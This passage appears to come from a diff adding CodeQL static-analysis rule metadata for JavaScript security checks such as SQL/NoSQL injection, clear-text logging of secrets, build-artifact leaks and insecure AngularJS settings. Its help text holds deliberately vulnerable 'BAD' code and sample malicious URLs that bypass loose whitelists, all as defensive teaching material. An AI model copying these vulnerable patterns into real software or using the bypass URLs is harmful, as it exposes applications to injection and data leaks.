Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${process.env}`);\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${not_sensitive_data}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-359", "external/cwe/cwe-532" ], + "description" : "Logging sensitive information without encryption or hashing can\n expose it to an attacker.", + "id" : "js/clear-text-logging", + "kind" : "path-problem", + "name" : "Clear-text logging of sensitive information", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/build-artifact-leak", + "name" : "js/build-artifact-leak", + "shortDescription" : { + "text" : "Storage of sensitive information in build artifact" + }, + "fullDescription" : { + "text" : "Including sensitive information in a build artifact can expose it to an attacker." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n \"process.env\": JSON.stringify(process.env)\n })\n ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n })\n ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", + "markdown" : "# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` 
configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n \"process.env\": JSON.stringify(process.env)\n })\n ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n })\n ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-315", "external/cwe/cwe-359" ], + "description" : "Including sensitive information in a build artifact can\n expose it to an attacker.", + "id" : "js/build-artifact-leak", + "kind" : "path-problem", + "name" : "Storage of sensitive information in build artifact", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/sql-injection", + "name" : "js/sql-injection", + "shortDescription" : { + "text" : "Database query built from user-controlled sources" + }, + "fullDescription" : { + "text" : "Building a database query from user-controlled sources is vulnerable to insertion of malicious code by the user." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Database query built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // BAD: the category might have SQL special characters in it\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n req.params.category +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. 
In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: use parameters\n var query2 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n pool.query(query2, [req.params.category], function(err, results) {\n // process results\n });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n SqlString = require('sqlstring'),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: the category is escaped using mysql.escape\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n SqlString.escape(req.params.category) +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. 
The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n \"Todo\",\n new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n\n await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n if (typeof id !== \"string\") {\n res.status(400).json({ status: \"error\" });\n return;\n }\n await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n", + "markdown" : "# Database query 
built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // BAD: the category might have SQL special characters in it\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n req.params.category +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. 
This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: use parameters\n var query2 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n pool.query(query2, [req.params.category], function(err, results) {\n // process results\n });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n SqlString = require('sqlstring'),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: the category is escaped using mysql.escape\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n SqlString.escape(req.params.category) +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. 
The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n \"Todo\",\n new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n\n await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n if (typeof id !== \"string\") {\n res.status(400).json({ status: \"error\" });\n return;\n }\n await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n" + }, + "properties" : { + "tags" : 
[ "security", "external/cwe/cwe-089", "external/cwe/cwe-090", "external/cwe/cwe-943" ], + "description" : "Building a database query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", + "id" : "js/sql-injection", + "kind" : "path-problem", + "name" : "Database query built from user-controlled sources", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/angular/disabling-sce", + "name" : "js/angular/disabling-sce", + "shortDescription" : { + "text" : "Disabling SCE" + }, + "fullDescription" : { + "text" : "Disabling strict contextual escaping (SCE) can cause security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n .config(function($sceProvider) {\n $sceProvider.enabled(false); // BAD\n }).controller('controller', function($scope) {\n // ...\n $scope.html = '
  • ' + item.toString() + '
';\n });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n .controller('controller', function($scope, $sce) {\n // ...\n // GOOD (but should use the templating system instead)\n $scope.html = $sce.trustAsHtml('
  • ' + item.toString() + '
'); \n });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n .config(function($sceProvider) {\n $sceProvider.enabled(false); // BAD\n }).controller('controller', function($scope) {\n // ...\n $scope.html = '
  • ' + item.toString() + '
';\n });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n .controller('controller', function($scope, $sce) {\n // ...\n // GOOD (but should use the templating system instead)\n $scope.html = $sce.trustAsHtml('
  • ' + item.toString() + '
'); \n });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "maintainability", "frameworks/angularjs", "external/cwe/cwe-116" ], + "description" : "Disabling strict contextual escaping (SCE) can cause security vulnerabilities.", + "id" : "js/angular/disabling-sce", + "kind" : "problem", + "name" : "Disabling SCE", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/angular/double-compilation", + "name" : "js/angular/double-compilation", + "shortDescription" : { + "text" : "Double compilation" + }, + "fullDescription" : { + "text" : "Recompiling an already compiled part of the DOM can lead to unexpected behavior of directives, performance problems, and memory leaks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. 
Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(element)(scope); // NOT OK\n }\n };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(tooltip)(scope); // OK\n }\n };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n", + "markdown" : "# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. 
Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(element)(scope); // NOT OK\n }\n };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(tooltip)(scope); // OK\n }\n };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n" + }, + "properties" : { + "tags" : [ "reliability", "frameworks/angularjs", "security", "external/cwe/cwe-1176" ], + "description" : "Recompiling an already compiled part of the DOM can lead to\n unexpected behavior of directives, performance problems, and memory leaks.", + "id" : "js/angular/double-compilation", + "kind" : "problem", + "name" : "Double compilation", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : 
"8.8" + } + }, { + "id" : "js/angular/insecure-url-whitelist", + "name" : "js/angular/insecure-url-whitelist", + "shortDescription" : { + "text" : "Insecure URL whitelist" + }, + "fullDescription" : { + "text" : "URL whitelists that are too permissive can cause security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n .config(function($sceDelegateProvider) {\n $sceDelegateProvider.resourceUrlWhitelist([\n \"*://example.org/*\", // BAD\n \"https://**.example.com/*\", // BAD\n \"https://example.**\", // BAD\n \"https://example.*\" // BAD\n ]);\n });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n", + "markdown" : "# 
Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n .config(function($sceDelegateProvider) {\n $sceDelegateProvider.resourceUrlWhitelist([\n \"*://example.org/*\", // BAD\n \"https://**.example.com/*\", // BAD\n \"https://example.**\", // BAD\n \"https://example.*\" // BAD\n ]);\n });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n" + }, + "properties" : { + "tags" : [ "security", "frameworks/angularjs", "external/cwe/cwe-183", "external/cwe/cwe-625" ], + "description" : "URL whitelists that are too permissive can cause security vulnerabilities.", + "id" : "js/angular/insecure-url-whitelist", + "kind" : "problem", + "name" : "Insecure URL whitelist", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "7.5" 
+ } + }, { + "id" : "js/identity-replacement", + "name" : "js/identity-replacement", + "shortDescription" : { + "text" : "Replacement of a substring with itself" + }, + "fullDescription" : { + "text" : "Replacing a substring with itself has no effect and may indicate a mistake." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. 
Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. 
Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-116" ], + "description" : "Replacing a substring with itself has no effect and may indicate a mistake.", + "id" : "js/identity-replacement", + "kind" : "problem", + "name" : "Replacement of a substring with itself", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/unsafe-external-link", + "name" : "js/unsafe-external-link", + "shortDescription" : { + "text" : "Potentially unsafe external link" + }, + "fullDescription" : { + "text" : "External links that open in a new tab or window but do not specify link type 'noopener' or 'noreferrer' are a potential security risk." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. 
Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n", + "markdown" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. 
Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n" + }, + "properties" : { + "tags" : [ "maintainability", "security", "external/cwe/cwe-200", "external/cwe/cwe-1022" ], + "description" : "External links that open in a new tab or window but do not specify\n link type 'noopener' or 'noreferrer' are a potential security risk.", + "id" : "js/unsafe-external-link", + "kind" : "problem", + "name" : "Potentially unsafe external link", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/regex/missing-regexp-anchor", + "name" : "js/regex/missing-regexp-anchor", + "shortDescription" : { + "text" : "Missing regular expression anchor" + }, + "fullDescription" : { + "text" : "Regular expressions without anchors can be vulnerable to bypassing." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. 
